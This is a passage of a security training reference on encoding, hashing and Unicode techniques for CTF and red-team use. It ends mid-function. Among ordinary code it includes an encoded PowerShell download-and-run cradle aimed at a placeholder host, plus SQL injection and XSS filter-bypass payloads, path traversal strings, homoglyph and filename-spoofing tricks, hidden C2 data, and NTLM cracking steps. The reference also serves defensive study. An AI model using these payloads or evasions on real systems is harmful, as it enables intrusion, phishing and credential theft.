Encoding, Decoding & Data Manipulation — Ultimate Reference

CIPHER training material. Every section includes working code examples for Python 3.10+ and/or Bash/PowerShell. Designed for CTFs, forensics, exploit development, and red/blue team operations.

Base Encoding
Hex Encoding
URL Encoding
HTML Entities
Unicode
Hashing
XOR
ROT13 / ROT47 / Caesar
JWT
Regular Expressions for Security
Obfuscation & Deobfuscation
Serialization Security
Compression Security
Binary & Struct Manipulation
CyberChef Reference

1. Base Encoding

Base64

Standard alphabet: A-Za-z0-9+/ with = padding. URL-safe variant uses -_ instead of +/.

import base64

# --- Encode / Decode ---
plaintext = b"attack at dawn"
encoded = base64.b64encode(plaintext)          # b'YXR0YWNrIGF0IGRhd24='
decoded = base64.b64decode(encoded)            # b'attack at dawn'

# --- URL-safe Base64 (replaces + with -, / with _) ---
url_encoded = base64.urlsafe_b64encode(plaintext)   # b'YXR0YWNrIGF0IGRhd24='
url_decoded = base64.urlsafe_b64decode(url_encoded)

# --- Decode without padding (common in JWTs, cookies) ---
no_pad = b"YXR0YWNrIGF0IGRhd24"   # missing '='
decoded = base64.b64decode(no_pad + b"=" * (-len(no_pad) % 4))

# --- Detect Base64 ---
import re
def is_base64(s: str) -> bool:
    # fullmatch avoids '$' accepting a trailing newline; '+' rejects the empty string
    pattern = r'[A-Za-z0-9+/]+={0,2}'
    return bool(re.fullmatch(pattern, s)) and len(s) % 4 == 0

# --- File encode/decode ---
with open("/etc/passwd", "rb") as f:
    encoded_file = base64.b64encode(f.read())

# Bash — encode/decode
echo -n "attack at dawn" | base64                    # YXR0YWNrIGF0IGRhd24=
echo "YXR0YWNrIGF0IGRhd24=" | base64 -d             # attack at dawn

# File encode/decode
base64 /etc/passwd > passwd.b64
base64 -d passwd.b64 > passwd_restored

# Decode without trailing newline issues
echo -n "YXR0YWNrIGF0IGRhd24=" | base64 -d

# PowerShell — encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
[Convert]::ToBase64String($bytes)                    # YXR0YWNrIGF0IGRhd24=

$decoded = [Convert]::FromBase64String("YXR0YWNrIGF0IGRhd24=")
[System.Text.Encoding]::UTF8.GetString($decoded)     # attack at dawn

# File encode
$raw = [IO.File]::ReadAllBytes("C:\Windows\System32\calc.exe")
[Convert]::ToBase64String($raw) | Out-File calc.b64

Security notes:

Base64 is NOT encryption. Attackers use it to bypass naive content filters.
Double-base64 encoding is common in obfuscated payloads.
Look for Base64 in HTTP headers (Authorization: Basic), cookies, POST bodies.
PowerShell -EncodedCommand accepts UTF-16LE Base64: powershell -enc <base64>.
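
The last two notes can be combined into a small triage helper. This is a minimal sketch rather than a definitive tool: peel_base64 and decode_encoded_command are hypothetical names, and the stop condition (a strict alphabet check via validate=True) is an assumption that will over-decode short plaintexts that happen to be valid Base64 themselves.

```python
import base64
import binascii

def peel_base64(data: bytes, max_layers: int = 5) -> tuple[bytes, int]:
    """Decode repeatedly while the data still parses as strict Base64."""
    layers = 0
    while layers < max_layers:
        try:
            # validate=True raises on characters outside the standard alphabet
            decoded = base64.b64decode(data.strip(), validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded:
            break
        data = decoded
        layers += 1
    return data, layers

def decode_encoded_command(b64: str) -> str:
    """Recover the script text from a PowerShell -EncodedCommand argument."""
    return base64.b64decode(b64).decode('utf-16-le')

double = base64.b64encode(base64.b64encode(b"attack at dawn"))
print(peel_base64(double))   # (b'attack at dawn', 2)
```

The loop stops at "attack at dawn" only because the spaces fall outside the Base64 alphabet; real samples usually need an extra sanity check on each decoded layer.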

Base32

Alphabet: A-Z2-7 with = padding. Case-insensitive. Used in TOTP/HOTP secrets, onion addresses.

import base64

encoded = base64.b32encode(b"attack at dawn")   # b'MF2HIYLDNMQGC5BAMRQXO3Q='
decoded = base64.b32decode(encoded)              # b'attack at dawn'

# Case insensitive decode
decoded = base64.b32decode(b"mf2hiyldnmqgc5bamrqxo3q=", casefold=True)

# Bash (requires coreutils or python)
echo -n "attack at dawn" | base32                    # MF2HIYLDNMQGC5BAMRQXO3Q=
echo "MF2HIYLDNMQGC5BAMRQXO3Q=" | base32 -d         # attack at dawn

Base58

No 0OIl characters (avoids visual ambiguity). Used in Bitcoin addresses, IPFS CIDs.

# pip install base58
import base58

encoded = base58.b58encode(b"attack at dawn")   # bytes object, 19 Base58 characters for this input
decoded = base58.b58decode(encoded)              # b'attack at dawn'

# Base58Check (Bitcoin) — includes version byte + 4-byte checksum
encoded_check = base58.b58encode_check(b"\x00" + b"attack at dawn")

Base85 (Ascii85)

Higher density than Base64 — 4 bytes become 5 ASCII chars. Used in PDF, Git binary patches, ZeroMQ.

import base64

# Ascii85 (Adobe variant)
encoded = base64.a85encode(b"attack at dawn")    # b'@<?U"@r!2qF<G+&GA['
decoded = base64.a85decode(encoded)

# Base85 (RFC 1924 / Git variant)
encoded = base64.b85encode(b"attack at dawn")    # b'VRUq1V{0H`bRcA5cWw'
decoded = base64.b85decode(encoded)

# Bash — using Python one-liner
echo -n "attack at dawn" | python3 -c "import sys,base64; print(base64.b85encode(sys.stdin.buffer.read()).decode())"

Base encoding detection heuristics

Encoding	Alphabet	Padding	Length multiple
Base64	`A-Za-z0-9+/`	`=` (0-2)	4
Base64url	`A-Za-z0-9-_`	`=` or none	4
Base32	`A-Z2-7`	`=` (0-6)	8
Base58	`123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz`	None	Variable
Base85	`!-u` (ASCII 33-117)	None	5 per 4 bytes
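
The table can be turned into a rough classifier. The sketch below is an assumption-laden illustration (guess_encodings and the pattern list are hypothetical, not part of any library): it returns every encoding whose alphabet and padding rules the string satisfies, so overlapping alphabets produce several candidates that still need to be confirmed by actually decoding.

```python
import re

# Ordered from the most restrictive alphabet to the least restrictive.
_PATTERNS = [
    ("hex", re.compile(r'(?:[0-9a-fA-F]{2})+')),
    ("base32", re.compile(
        r'(?:[A-Z2-7]{8})*'
        r'(?:[A-Z2-7]{2}={6}|[A-Z2-7]{4}={4}|[A-Z2-7]{5}={3}|[A-Z2-7]{7}=)?')),
    ("base58", re.compile(r'[1-9A-HJ-NP-Za-km-z]+')),
    ("base64", re.compile(
        r'(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?')),
    ("base64url", re.compile(r'[A-Za-z0-9_-]+={0,2}')),
]

def guess_encodings(s: str) -> list[str]:
    """Return the names of all encodings whose format the string matches."""
    s = s.strip()
    if not s:
        return []
    return [name for name, pattern in _PATTERNS if pattern.fullmatch(s)]

print(guess_encodings("61747461636b206174206461776e"))
print(guess_encodings("YXR0YWNrIGF0IGRhd24="))
```

A hex string with a length divisible by 4 also satisfies the Base64 rules, which is why the result is a candidate list rather than a single answer.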

2. Hex Encoding

Hex to/from ASCII

# --- ASCII to Hex ---
text = "attack at dawn"
hex_str = text.encode().hex()                        # '61747461636b206174206461776e'
hex_spaced = ' '.join(f'{b:02x}' for b in text.encode())  # '61 74 74 61 63 6b ...'

# --- Hex to ASCII ---
recovered = bytes.fromhex('61747461636b206174206461776e').decode()  # 'attack at dawn'

# --- Hex to ASCII ignoring whitespace ---
dirty_hex = "61 74 74 61\n63 6b"
clean = bytes.fromhex(dirty_hex)   # b'attack'; fromhex() skips ASCII whitespace (Python 3.7+)

# --- Hexdump (xxd-style) ---
import binascii
data = b"\x7fELF\x02\x01\x01\x00"
for i in range(0, len(data), 16):
    chunk = data[i:i+16]
    hex_part = ' '.join(f'{b:02x}' for b in chunk)
    ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
    print(f'{i:08x}  {hex_part:<48}  |{ascii_part}|')

# ASCII to hex
echo -n "attack at dawn" | xxd -p                     # 61747461636b206174206461776e
echo -n "attack at dawn" | od -A x -t x1z -v

# Hex to ASCII
echo "61747461636b206174206461776e" | xxd -r -p        # attack at dawn

# Hexdump a binary
xxd /bin/ls | head -20
hexdump -C /bin/ls | head -20

# PowerShell — hex encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
($bytes | ForEach-Object { '{0:x2}' -f $_ }) -join ''

# Hex to bytes
$hex = "61747461636b206174206461776e"
$bytes = for ($i = 0; $i -lt $hex.Length; $i += 2) {
    [Convert]::ToByte($hex.Substring($i, 2), 16)
}
[System.Text.Encoding]::UTF8.GetString($bytes)

Hex to/from Binary and Decimal

# Hex <-> Decimal
hex_val = "deadbeef"
decimal = int(hex_val, 16)              # 3735928559
back_to_hex = hex(decimal)              # '0xdeadbeef'

# Hex <-> Binary
binary = bin(int("ff", 16))             # '0b11111111'
hex_from_bin = hex(int("11111111", 2))  # '0xff'

# IP address: dotted decimal <-> hex
import ipaddress
ip = ipaddress.IPv4Address("192.168.1.1")
hex_ip = format(int(ip), '08x')         # 'c0a80101'
ip_back = ipaddress.IPv4Address(int(hex_ip, 16))  # 192.168.1.1

# Useful for shellcode: \x escape format
shellcode_hex = "6a0258994889d74831f60f05"
shellcode_escaped = ''.join(f'\\x{shellcode_hex[i:i+2]}' for i in range(0, len(shellcode_hex), 2))
# '\\x6a\\x02\\x58\\x99\\x48\\x89\\xd7\\x48\\x31\\xf6\\x0f\\x05'

shellcode_bytes = bytes.fromhex(shellcode_hex)

# Decimal to hex
printf '%x\n' 3735928559                # deadbeef

# Hex to decimal
echo $((16#deadbeef))                   # 3735928559
printf '%d\n' 0xdeadbeef               # 3735928559

# Binary to hex
echo "obase=16;ibase=2;11011110101011011011111011101111" | bc  # DEADBEEF

3. URL Encoding

Single encoding

from urllib.parse import quote, unquote, quote_plus, unquote_plus

# Standard percent-encoding (space -> %20)
encoded = quote("admin' OR 1=1--")           # "admin%27%20OR%201%3D1--"
decoded = unquote("admin%27%20OR%201%3D1--")  # "admin' OR 1=1--"

# Plus-encoding (space -> +, used in form data)
encoded = quote_plus("search term here")     # "search+term+here"
decoded = unquote_plus("search+term+here")   # "search term here"

# safe='' also encodes '/', which quote() leaves untouched by default
# Unreserved characters (letters, digits, '_', '.', '-', '~') are never encoded
fully_encoded = quote("test", safe='')        # 'test'
fully_encoded = quote("/path/file", safe='')  # '%2Fpath%2Ffile'

Double encoding (WAF bypass)

from urllib.parse import quote

payload = "' OR 1=1--"
single = quote(payload, safe='')        # %27%20OR%201%3D1--
double = quote(single, safe='')         # %2527%2520OR%25201%253D1--

# Server that decodes twice will see the original payload
# First decode:  %27%20OR%201%3D1--
# Second decode: ' OR 1=1--

# Triple encoding (rare, but seen in nested proxies)
triple = quote(quote(quote(payload, safe=''), safe=''), safe='')

Unicode URL encoding

from urllib.parse import quote

# UTF-8 URL encoding of Unicode characters
encoded = quote("file:///../etc/passwd")            # standard
encoded = quote("\u2025")                            # %E2%80%A5 (two-dot leader)
# Some parsers normalize \u2025 to ".." -> path traversal

# IRI to URI conversion
iri = "https://example.com/path/\u00e9"              # e-acute
uri = quote(iri, safe=':/@')                         # https://example.com/path/%C3%A9

# Overlong UTF-8 encoding (historic bypass, CVE-2000-0884 IIS)
# Normal '/' = 0x2F = %2F
# Overlong 2-byte: 0xC0 0xAF = %C0%AF
# Overlong 3-byte: 0xE0 0x80 0xAF = %E0%80%AF
# Modern parsers reject these, but legacy systems may not
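
To make the overlong form concrete, the following sketch builds the 2-byte overlong encoding of an ASCII character and shows that Python's strict UTF-8 decoder refuses it. The helper names overlong_2byte and is_valid_utf8 are hypothetical and exist only for this illustration.

```python
def overlong_2byte(ch: str) -> bytes:
    """Build the invalid 2-byte overlong UTF-8 form of an ASCII character."""
    cp = ord(ch)
    if cp > 0x7F:
        raise ValueError("only ASCII code points have a 2-byte overlong form")
    # 110xxxxx 10xxxxxx layout filled with a value that fits in one byte
    return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])

def is_valid_utf8(data: bytes) -> bool:
    """Return True if the strict decoder accepts the byte sequence."""
    try:
        data.decode('utf-8')
        return True
    except UnicodeDecodeError:
        return False

overlong = overlong_2byte('/')
print(overlong.hex(), is_valid_utf8(overlong))   # c0af False
```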

# Bash — URL encode
python3 -c "from urllib.parse import quote; print(quote(\"admin' OR 1=1--\", safe=''))"

# URL encode with curl
curl -G --data-urlencode "q=admin' OR 1=1--" http://example.com/search

# URL decode
python3 -c "from urllib.parse import unquote; print(unquote('%27%20OR%201%3D1--'))"

# PowerShell
[System.Uri]::EscapeDataString("admin' OR 1=1--")
[System.Uri]::UnescapeDataString("%27%20OR%201%3D1--")

# .NET HttpUtility (requires System.Web)
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlEncode("admin' OR 1=1--")
[System.Web.HttpUtility]::UrlDecode("%27+OR+1%3D1--")

Security notes:

Double encoding bypasses WAFs that decode only once before rule matching.
%00 (null byte) truncates strings in C-based parsers — file.php%00.jpg may bypass extension checks.
%0d%0a = CRLF injection in HTTP headers.
Path normalization differences between proxy and backend enable smuggling.
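
One way to catch double encoding on the defensive side is to decode until the value stops changing and inspect every intermediate form. This is a minimal sketch; url_decode_layers is a hypothetical helper and the round limit of 5 is an arbitrary assumption.

```python
from urllib.parse import unquote

def url_decode_layers(value: str, max_rounds: int = 5) -> list[str]:
    """Return the input plus each decoded form until decoding is a no-op."""
    forms = [value]
    for _ in range(max_rounds):
        decoded = unquote(forms[-1])
        if decoded == forms[-1]:
            break
        forms.append(decoded)
    return forms

for depth, form in enumerate(url_decode_layers("%2527%2520OR%25201%253D1--")):
    print(depth, form)
# 0 %2527%2520OR%25201%253D1--
# 1 %27%20OR%201%3D1--
# 2 ' OR 1=1--
```

More than one decoding round on a request parameter is itself a useful detection signal, independent of what the final payload looks like.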

4. HTML Entities

Named entities

import html

# Encode: html.escape() converts &, <, > and, because quote=True is the default, also " and '
encoded = html.escape('<script>alert("XSS")</script>')
# '&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;'

# Single quotes become &#x27;; pass quote=False to leave both quote characters untouched
encoded = html.escape("it's <dangerous>")
# 'it&#x27;s &lt;dangerous&gt;'

# Decode
decoded = html.unescape('&lt;script&gt;alert(1)&lt;/script&gt;')
# '<script>alert(1)</script>'
decoded = html.unescape('&amp;lt;')  # '&lt;'  — only one layer decoded

Numeric (decimal) entities

# Character to decimal entity
char = '<'
entity = f'&#{ord(char)};'             # '&#60;'

# String to all-decimal-entities (XSS obfuscation)
payload = '<script>alert(1)</script>'
obfuscated = ''.join(f'&#{ord(c)};' for c in payload)
# '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;...'

# Decode
import html
decoded = html.unescape('&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;')
# '<script>'

Hex entities

# Character to hex entity
char = '<'
entity = f'&#x{ord(char):x};'          # '&#x3c;'

# String to all-hex-entities
payload = '<img src=x onerror=alert(1)>'
obfuscated = ''.join(f'&#x{ord(c):x};' for c in payload)
# '&#x3c;&#x69;&#x6d;&#x67;...'

# Mixed encoding (harder for filters)
# &#60;script&#x3e;alert&#40;1&#41;&#60;/script&#x3e;

# Decode all forms
import html
html.unescape('&#x3c;&#60;&lt;')       # '<<<'

# Bash — decode HTML entities
python3 -c "import html; print(html.unescape('&lt;script&gt;'))"

# Encode
python3 -c "import html; print(html.escape('<script>alert(1)</script>'))"

Security notes:

Browsers decode HTML entities in attribute values: for example, <a href="&#106;avascript:alert(1)"> still runs, because the entity is decoded to "j" before the URL is interpreted.
Entity encoding without semicolons works in some browsers: &#60script parsed as <script.
Null bytes in entities: &#0; may bypass filters.
Double encoding: &amp;lt; decodes to &lt; on first pass, < on second.

Quick reference table

Character	Named	Decimal	Hex
`<`	`&lt;`	`&#60;`	`&#x3c;`
`>`	`&gt;`	`&#62;`	`&#x3e;`
`&`	`&amp;`	`&#38;`	`&#x26;`
`"`	`&quot;`	`&#34;`	`&#x22;`
`'`	`&apos;`	`&#39;`	`&#x27;`
`/`	(none)	`&#47;`	`&#x2f;`

5. Unicode

UTF-8 encoding internals

# UTF-8 byte representation
text = "cafe\u0301"     # 'e' followed by combining acute accent U+0301; renders as "café"
utf8_bytes = text.encode('utf-8')
print(utf8_bytes.hex())  # 63616665cc81

# Character byte length in UTF-8
for char in ['A', '\u00e9', '\u4e16', '\U0001f600']:
    encoded = char.encode('utf-8')
    print(f"U+{ord(char):04X}  {char!r:>10}  {len(encoded)} bytes  {encoded.hex()}")
# U+0041         'A'  1 bytes  41
# U+00E9         'é'  2 bytes  c3a9
# U+4E16         '世'  3 bytes  e4b896
# U+1F600         '😀'  4 bytes  f09f9880

# UTF-8 byte ranges
# 0xxxxxxx             -> 1 byte  (U+0000 to U+007F)
# 110xxxxx 10xxxxxx     -> 2 bytes (U+0080 to U+07FF)
# 1110xxxx 10xxxxxx 10xxxxxx  -> 3 bytes (U+0800 to U+FFFF)
# 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx -> 4 bytes (U+10000 to U+10FFFF)
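
The bit layouts above can be checked with a hand-rolled encoder. This is an illustrative sketch only (utf8_encode is a hypothetical name; in practice str.encode('utf-8') does the job), but it shows exactly where each group of code point bits ends up.

```python
def utf8_encode(cp: int) -> bytes:
    """Encode one Unicode scalar value using the UTF-8 bit layouts."""
    if cp < 0 or cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
        raise ValueError("not a Unicode scalar value")
    if cp <= 0x7F:                       # 0xxxxxxx
        return bytes([cp])
    if cp <= 0x7FF:                      # 110xxxxx 10xxxxxx
        return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])
    if cp <= 0xFFFF:                     # 1110xxxx 10xxxxxx 10xxxxxx
        return bytes([0xE0 | (cp >> 12),
                      0x80 | ((cp >> 6) & 0x3F),
                      0x80 | (cp & 0x3F)])
    return bytes([0xF0 | (cp >> 18),     # 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
                  0x80 | ((cp >> 12) & 0x3F),
                  0x80 | ((cp >> 6) & 0x3F),
                  0x80 | (cp & 0x3F)])

for ch in ['A', '\u00e9', '\u4e16', '\U0001f600']:
    assert utf8_encode(ord(ch)) == ch.encode('utf-8')
    print(f"U+{ord(ch):04X} -> {utf8_encode(ord(ch)).hex()}")
```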

UTF-16 encoding

# UTF-16LE is the standard for Windows internals and PowerShell -EncodedCommand
text = "calc.exe"
utf16le = text.encode('utf-16-le')
print(utf16le.hex())    # 630061006c0063002e00650078006500

# Decode
decoded = utf16le.decode('utf-16-le')  # 'calc.exe'

# PowerShell encoded command preparation
import base64
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
encoded_cmd = base64.b64encode(cmd.encode('utf-16-le')).decode()
# Use as: powershell -enc <encoded_cmd>

# UTF-16 BOM detection
data_le = b'\xff\xfe\x41\x00'   # UTF-16-LE BOM (FF FE) + 'A'
data_be = b'\xfe\xff\x00\x41'   # UTF-16-BE BOM (FE FF) + 'A'

Punycode (IDN homograph attacks)

# Punycode encodes Unicode domain names for DNS
domain = "example.com"
evil_domain = "\u0435xample.com"   # Cyrillic 'e' (U+0435) instead of Latin 'e'

# Encode to punycode (ACE form)
punycode = evil_domain.encode('idna')   # b'xn--xample-2of.com'

# Decode punycode
decoded = b'xn--xample-2of.com'.decode('idna')  # looks like 'example.com'

# Detect homographs
def has_mixed_scripts(domain: str) -> bool:
    import unicodedata
    scripts = set()
    for char in domain:
        if char in '.-':
            continue
        cat = unicodedata.category(char)
        if cat.startswith('L'):
            # Rough script detection via name
            name = unicodedata.name(char, '')
            if 'CYRILLIC' in name:
                scripts.add('cyrillic')
            elif 'LATIN' in name:
                scripts.add('latin')
            elif 'GREEK' in name:
                scripts.add('greek')
    return len(scripts) > 1

print(has_mixed_scripts("\u0435xample.com"))  # True — mixed Cyrillic + Latin

# Bash — punycode conversion
python3 -c "print('\u0435xample.com'.encode('idna'))"

# Using idn command (libidn)
echo "xn--xample-2of.com" | idn --idna-to-unicode 2>/dev/null

Homoglyph attacks

# Characters that look identical but have different codepoints
homoglyphs = {
    'a': ['\u0430'],              # Cyrillic а
    'e': ['\u0435'],              # Cyrillic е
    'o': ['\u043e', '\u03bf'],    # Cyrillic о, Greek ο
    'p': ['\u0440'],              # Cyrillic р
    'c': ['\u0441'],              # Cyrillic с
    'x': ['\u0445'],              # Cyrillic х
    'H': ['\u041d'],              # Cyrillic Н
    'T': ['\u0422'],              # Cyrillic Т
    'B': ['\u0412'],              # Cyrillic В
    'A': ['\u0391'],              # Greek Α
    'l': ['\u04cf', '\u0049'],    # Cyrillic palochka, Latin I
    '0': ['\u041e'],              # Cyrillic О
    '/': ['\u2044', '\u2215'],    # Fraction slash, Division slash
}

# Generate confusable version of a URL
def generate_confusable(url: str) -> str:
    import random
    result = []
    for char in url:
        if char in homoglyphs and random.random() > 0.5:
            result.append(random.choice(homoglyphs[char]))
        else:
            result.append(char)
    return ''.join(result)

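# Detection: normalize and compare
# NFKC only folds compatibility variants (fullwidth forms, ligatures, and similar).
# It does not map Cyrillic or Greek lookalikes to Latin, so cross-script homoglyphs
# need a confusables table such as the one published with Unicode TR39.
import unicodedata
def confusable_check(s1: str, s2: str) -> bool:
    n1 = unicodedata.normalize('NFKC', s1).lower()
    n2 = unicodedata.normalize('NFKC', s2).lower()
    return n1 == n2 and s1 != s2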
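
Since normalization alone leaves Cyrillic and Greek lookalikes unchanged, a table-driven "skeleton" comparison is one way to catch them. The sketch below is illustrative only: CONFUSABLE_TO_LATIN is a tiny hand-picked subset, and skeleton and is_lookalike are hypothetical names. A real check would load the full confusables data from Unicode TR39.

```python
import unicodedata

# Small illustrative subset of lookalike code points mapped to Latin letters.
CONFUSABLE_TO_LATIN = {
    '\u0430': 'a',  # Cyrillic a
    '\u0435': 'e',  # Cyrillic ie
    '\u043e': 'o',  # Cyrillic o
    '\u0440': 'p',  # Cyrillic er
    '\u0441': 'c',  # Cyrillic es
    '\u0445': 'x',  # Cyrillic ha
    '\u03bf': 'o',  # Greek omicron
}

def skeleton(s: str) -> str:
    """Fold compatibility forms and case, then map known lookalikes to Latin."""
    folded = unicodedata.normalize('NFKC', s).lower()
    return ''.join(CONFUSABLE_TO_LATIN.get(ch, ch) for ch in folded)

def is_lookalike(candidate: str, trusted: str) -> bool:
    """True if candidate differs from trusted but has the same skeleton."""
    return candidate != trusted and skeleton(candidate) == skeleton(trusted)

print(is_lookalike("\u0435xample.com", "example.com"))   # True
print(is_lookalike("example.com", "example.com"))        # False
```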

Zero-width characters (steganography / watermarking)

# Zero-width characters are invisible but present in text
ZWSP = '\u200b'    # Zero-Width Space
ZWNJ = '\u200c'    # Zero-Width Non-Joiner
ZWJ  = '\u200d'    # Zero-Width Joiner
ZWNS = '\ufeff'    # Zero-Width No-Break Space (BOM)

# Encode binary data in zero-width characters
def zw_encode(secret: str) -> str:
    """Encode secret as zero-width characters between visible text."""
    bits = ''.join(f'{b:08b}' for b in secret.encode())
    zw_str = ''
    for bit in bits:
        zw_str += ZWJ if bit == '1' else ZWSP
    return zw_str

def zw_decode(text: str) -> str:
    """Extract zero-width encoded secret from text."""
    bits = ''
    for char in text:
        if char == ZWJ:
            bits += '1'
        elif char == ZWSP:
            bits += '0'
    byte_list = [int(bits[i:i+8], 2) for i in range(0, len(bits) - len(bits) % 8, 8)]
    return bytes(byte_list).decode('utf-8', errors='ignore')

# Embed in innocent text
visible = "Nothing to see here"
hidden = zw_encode("C2:10.0.0.1")
watermarked = visible[:7] + hidden + visible[7:]
# Looks like "Nothing to see here" but contains hidden data

# Detect zero-width characters
def detect_zw(text: str) -> list[tuple[int, str, str]]:
    zw_chars = {'\u200b': 'ZWSP', '\u200c': 'ZWNJ', '\u200d': 'ZWJ',
                '\ufeff': 'BOM', '\u200e': 'LRM', '\u200f': 'RLM',
                '\u2060': 'WJ', '\u2061': 'FA', '\u2062': 'IT', '\u2063': 'IS'}
    found = []
    for i, char in enumerate(text):
        if char in zw_chars:
            found.append((i, f'U+{ord(char):04X}', zw_chars[char]))
    return found

# Strip zero-width characters
import re
def strip_zw(text: str) -> str:
    return re.sub(r'[\u200b-\u200f\u2060-\u2064\ufeff]', '', text)

Unicode normalization attacks

import unicodedata

# NFC, NFD, NFKC, NFKD normalization forms
# Exploitable when filter checks one form but app uses another

s = "file\u0000.txt"          # null byte injection
s = "\uff0e\uff0e/etc/passwd" # fullwidth dots '..' -> path traversal after NFKC

# NFKC normalizes fullwidth to ASCII
print(unicodedata.normalize('NFKC', '\uff0e\uff0e'))  # '..'
print(unicodedata.normalize('NFKC', '\uff1c'))         # '<'
print(unicodedata.normalize('NFKC', '\uff1e'))         # '>'

# Bypass WAF example:
# WAF blocks: <script>
# Send: \uff1cscript\uff1e   (fullwidth < and >)
# Backend normalizes NFKC: <script>  -> XSS

# Right-to-Left Override attack (file extension spoofing)
filename = "invoice\u202egnp.exe"
# Displays as: invoiceexe.png  (appears to be PNG)
# Actual file: invoice[RLO]gnp.exe  (is actually .exe)
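
A simple defensive check is to flag any bidirectional control character in a filename before it is shown to a user. This is a minimal sketch: BIDI_CONTROLS and find_bidi_controls are hypothetical names, and the set covers only the explicit embedding, override, and isolate controls.

```python
import unicodedata

BIDI_CONTROLS = {
    '\u202a', '\u202b', '\u202c', '\u202d', '\u202e',   # LRE, RLE, PDF, LRO, RLO
    '\u2066', '\u2067', '\u2068', '\u2069',             # LRI, RLI, FSI, PDI
}

def find_bidi_controls(name: str) -> list[tuple[int, str]]:
    """Return (index, Unicode name) for each bidi control in the string."""
    return [(i, unicodedata.name(ch))
            for i, ch in enumerate(name) if ch in BIDI_CONTROLS]

filename = "invoice\u202egnp.exe"
print(find_bidi_controls(filename))          # [(7, 'RIGHT-TO-LEFT OVERRIDE')]
print(filename.rsplit('.', 1)[-1])           # exe (the extension the OS acts on)
```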

6. Hashing

MD5 (128-bit, BROKEN for collision resistance)

import hashlib

# String hash
md5 = hashlib.md5(b"password").hexdigest()
# '5f4dcc3b5aa765d61d8327deb882cf99'

# File hash
def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            h.update(chunk)
    return h.hexdigest()

echo -n "password" | md5sum                       # 5f4dcc3b5aa765d61d8327deb882cf99
md5sum /etc/passwd                                 # file hash

$md5 = [System.Security.Cryptography.MD5]::Create()
$bytes = [System.Text.Encoding]::UTF8.GetBytes("password")
[BitConverter]::ToString($md5.ComputeHash($bytes)).Replace("-","").ToLower()

Get-FileHash -Algorithm MD5 C:\Windows\System32\calc.exe

SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)

sha1 = hashlib.sha1(b"password").hexdigest()
# '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'

echo -n "password" | sha1sum
sha1sum /bin/ls

SHA-256 (256-bit, current standard)

sha256 = hashlib.sha256(b"password").hexdigest()
# '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'

# HMAC-SHA256
import hmac
sig = hmac.new(b"secret_key", b"message", hashlib.sha256).hexdigest()

echo -n "password" | sha256sum
sha256sum /bin/ls
openssl dgst -sha256 /bin/ls

# HMAC
echo -n "message" | openssl dgst -sha256 -hmac "secret_key"

SHA-512 (512-bit)

sha512 = hashlib.sha512(b"password").hexdigest()
# 'b109f3bbbc244eb82441917ed06d618b9008dd09...'

echo -n "password" | sha512sum

NTLM (Windows password hash)

import hashlib

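def ntlm_hash(password: str) -> str:
    """Compute NTLM hash (MD4 of UTF-16LE password)."""
    # MD4 is supplied by OpenSSL; Python builds linked against OpenSSL 3 without
    # the legacy provider raise ValueError (unsupported hash type md4).
    return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()

print(ntlm_hash("Password1"))
# '64f12cddaa88057e06a81b54e73b949b'

# LM hash (legacy, DES-based, extremely weak)
# Uppercases the password, pads or truncates it to 14 bytes, splits it into two
# 7-byte halves, and uses each half as a DES key to encrypt the constant "KGS!@#$%"
# Not shown: do not use LM in any modern system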

# NTLM hash with Python one-liner
python3 -c "import hashlib; print(hashlib.new('md4', 'Password1'.encode('utf-16-le')).hexdigest())"

# Using openssl (if md4 available)
echo -n "Password1" | iconv -t utf-16le | openssl dgst -md4 2>/dev/null

Net-NTLMv2 (challenge-response, captured on the wire)

import hashlib
import hmac
import os

def compute_ntlmv2_response(password: str, user: str, domain: str,
                             server_challenge: bytes, client_challenge: bytes = None) -> str:
    """Compute Net-NTLMv2 response (simplified)."""
    if client_challenge is None:
        client_challenge = os.urandom(8)

    # Step 1: NTLM hash
    nt_hash = hashlib.new('md4', password.encode('utf-16-le')).digest()

    # Step 2: NTLMv2 hash = HMAC-MD5(NT_hash, uppercase(user) + domain)
    identity = (user.upper() + domain).encode('utf-16-le')
    ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()

    # Step 3: NTLMv2 response = HMAC-MD5(NTLMv2_hash, server_challenge + blob)
    # blob is complex in practice; simplified here
    blob = server_challenge + client_challenge
    ntlmv2_response = hmac.new(ntlmv2_hash, blob, hashlib.md5).hexdigest()

    return ntlmv2_response

# Hashcat format for cracking Net-NTLMv2:
# user::domain:server_challenge:ntlmv2_response:blob
# hashcat -m 5600 hash.txt wordlist.txt
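
Putting Step 3 and the hashcat line format together might look like the sketch below. It assumes the field order stated above, with the 16-byte HMAC-MD5 output and the blob written as separate hex fields; nt_proof_str and format_netntlmv2 are hypothetical helper names, and the sample values are made up.

```python
import hashlib
import hmac

def nt_proof_str(ntlmv2_hash: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """HMAC-MD5(NTLMv2_hash, server_challenge + blob), as in Step 3."""
    return hmac.new(ntlmv2_hash, server_challenge + blob, hashlib.md5).digest()

def format_netntlmv2(user: str, domain: str, server_challenge: bytes,
                     proof: bytes, blob: bytes) -> str:
    """Assemble user::domain:server_challenge:response:blob with hex fields."""
    return (f"{user}::{domain}:{server_challenge.hex()}:"
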